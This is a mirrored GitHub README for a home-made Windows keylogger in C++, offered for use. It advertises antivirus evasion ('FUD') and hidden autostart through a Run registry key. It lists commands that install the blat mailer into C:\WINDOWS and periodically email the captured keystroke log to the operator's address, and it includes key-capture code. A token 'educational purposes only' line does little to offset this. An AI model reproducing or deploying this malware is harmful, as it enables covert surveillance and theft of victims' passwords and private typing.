Giter Club home page Giter Club logo

remotekeylogger's Introduction


              ,ad8888ba,                       
             d8"'    `"8b   aa         aa      
            d8'             88         88      
            88          aaaa88aaaa aaaa88aaaa  
            88          """"88"""" """"88""""  
            Y8,             88         88      
             Y8a.    .a8P   ""         ""      
              `"Y8888Y"'                       

Remote Keylogger

A simple home made keylogger that send logs to your email .

Key FeaturesHow To UseCreditsLicense

screenshot

Key Features

  • Autostart on windows login
    • You need to bind the file or make a setup. Also you can create a ghost process.
  • FUD not detected by antivirus software.
  • Create a .txt log file, easy to send.
  • Log all keys, simbols, space and mouse click.
  • Sent to you a copy of the log periodically to your email.

How To Use

You can build the project using Visual Studio or DevC++ (free), then you need to insert additional tools in the same foldere of the .exe launcher file, or you can use the prebuild exe in the repository. Check out the code to change the file paths needed for some features

Mandatory: Edit the batch file!

With this code you can create windows register file for create an autostart ghost process on windows login. Change the path with your file name

Reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v prova /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v prova /t REG_SZ /d "C:\\lancio.exe\" /f

If you want you can change the directory

@COPY blat.exe C:\WINDOWS\blat.exe
@COPY blat.dll C:\WINDOWS\blat.dll
@COPY blat.lib C:\WINDOWS\blat.lib

Insert your email server and email address, change the timeout if you want

@blat -install out.alice.it yourmail@alice.it
cls
@blat keylogs.txt -to yourmail@alice.it -try 2 -subject Keylog
timeout /t 15
@blat keylogs.txt -to yourmail@alice.it -try 2 -subject Keylog
timeout /t 600

You can change the log file name in the main file

void WriteToLog(LPCSTR text) {
 ofstream logfile;
 logfile.open("keylogs.txt", fstream::app);
 logfile << text;
 logfile.close();
}

Delete the case option if you don't need to track mouse click or space for example

bool KeyIsListed(int iKey) {
 switch (iKey)
 {
 case VK_SPACE:
  cout << " ";
  WriteToLog(" ");
  break;
 case VK_RETURN:
  cout << "/n";
  WriteToLog("/n");
  break;
 case VK_SHIFT:
  cout << " Shift ";
  WriteToLog(" Shift ");
  break;
 case VK_BACK:
  cout << "/b";
  WriteToLog("/b");
  break;
 case VK_RBUTTON:
  cout << " rclick ";
  WriteToLog(" rclick ");
  break;
 case VK_LBUTTON:
  cout << " lclick ";
  WriteToLog(" lclick ");
  break;
 default: return FALSE;
 }

Note You can use temporany email too

Credits

Russo Giovanni M.

Use it for educational or legal purposes only

License

MIT


remotekeylogger's People

Contributors

turangarusso avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

remotekeylogger's Issues

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.